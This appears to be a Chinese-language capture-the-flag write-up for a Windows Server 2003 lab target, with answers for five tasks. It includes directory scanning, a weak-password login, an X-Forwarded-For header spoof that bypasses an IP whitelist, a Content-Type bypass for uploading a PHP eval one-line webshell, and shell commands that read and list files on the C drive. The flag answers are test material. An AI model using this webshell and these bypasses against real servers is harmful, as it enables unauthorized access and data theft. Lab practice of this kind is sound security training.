任务二十九:web安全应用-2
任务环境说明:
服务器场景:match_win03-3-1
服务器场景操作系统:windows Server 2003
1.使用渗透机Kali Linux,登录靶机HTTP服务后台管理页面,并将后台管理页面代码中的Flag值提交。
使用nmap扫描工具扫描靶机,查看端口开放情况
80端口正常开放,我们使用dirb扫描工具扫描靶机,找到后台管理网址
访问这个后台网址
使用弱口令账号密码登录admin;admin
Ip地址不在白名单,所以我们使用burpsuite抓包,然后添加X-Forwarded-For:127.0.0.1,本地访问。
设置好之后关闭拦截就可以了
进入管理页之后,右键查看源代码,ctrl+F搜索flag字样
Flag:Oauth0
2.使用渗透机Kali Linux,访问靶机HTTP服务,使用文本反馈功能上传PHP一句话木马(shell.php),并将上传后提示页面中唯一一行JavaScript代码作为Flag值提交。
访问http://靶机ip
,找到问题反馈,点击BUG反馈(文档方式)
在桌面创建一个名为shell.php的文件,文件内容为<?php @eval($_GET[“cmd”]);?>
在这里上传,然后使用burpsuite拦截,发送到重放器
Flag:windows.open(‘upload/’);
3.使用渗透机Kali Linux,访问靶机HTTP服务,通过一句话木马获取靶机C盘根目录下flag.txt中的内容,并将获取文件内容的函数作为Flag值提交。
在代理中,修改文件属性,不然上传不上去,靶机禁止上传php文件,我们把php文件属性修改成text/plain的txt文件属性就可
关闭拦截
要利用这个木马
首先要找到文件上传路径,但是他已经告诉我们shell.php文件的上传路径了
下一步就是要利用这个木马
在shell.php后面添加?cmd=echo file_get_contents(‘c:\\flag.txt’);
Flag:file_get_contents
4.使用渗透机Kali Linux,访问靶机HTTP服务,通过一句话木马获取靶机C盘根目录下flag.txt中的内容,并将文本中的内容作为Flag值提交。
内容上一题就已经找到了
Flag:hel10wOrld
5.使用渗透机Kali Linux,访问靶机HTTP服务,通过一句话木马找到C盘根目录下的唯一一个PNG图片文件,并提交图片源文件中的Flag值。
利用木马,在shell.php后面添加?cmd=system(‘dir c:\\’);
知道了c盘目录下的图片名称了,然后使用命令查看图片的内容
在shell.php后面添加?cmd=system(‘type c:\\geforce0.png’);
Flag:Ia98a8fA9a